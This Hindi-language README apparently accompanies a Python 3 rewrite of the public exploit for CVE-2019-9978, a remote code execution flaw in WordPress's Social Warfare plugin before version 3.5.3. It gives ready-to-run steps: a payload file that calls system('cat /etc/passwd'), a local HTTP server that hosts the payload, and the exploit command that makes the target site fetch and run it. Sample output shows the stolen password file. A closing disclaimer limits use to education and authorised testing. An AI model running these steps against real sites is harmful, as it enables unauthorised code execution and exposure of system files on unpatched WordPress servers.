
वर्डप्रेस के लिए Social Warfare प्लगइन में एक Remote Code Execution (RCE) कमजोरी, जो 3.5.3 से नीचे के संस्करणों को प्रभावित करती है।
WordPress के लिए Social Warfare प्लगइन में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी, जो 3.5.3 से नीचे के सभी संस्करणों को प्रभावित करती है।
मूल सार्वजनिक शोषण Python के एक पुराने संस्करण में लिखा गया था और अब आधुनिक वातावरण में ठीक से नहीं चलता।
मैंने शोषण को Python 3 के साथ पूरी तरह से संगत होने के लिए फिर से लिखा, जिससे इसे उपयोग करना, समझना और आधुनिक टूलींग में एकीकृत करना आसान हो गया।
निम्नलिखित सामग्री के साथ payload.txt नामक एक फ़ाइल बनाएं:
<pre>system('cat /etc/passwd')</pre>
अपने पेलोड को सर्व करने के लिए Python का उपयोग करें:
python3 -m http.server 8000
यह आपके payload.txt को इस पते पर सुलभ बनाएगा:
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
यदि लक्ष्य असुरक्षित है, तो आपको इसके समान आउटपुट प्राप्त होगा:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 यदि इस पेलोड ने आपका दिन बनाया, तो एक ⭐ मेरा दिन बनाएगा।
< 3.5.3⚠️ अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए है।
जिन सिस्टमों के आप मालिक नहीं हैं, उनके खिलाफ इस शोषण का अनधिकृत उपयोग सख्त वर्जित है।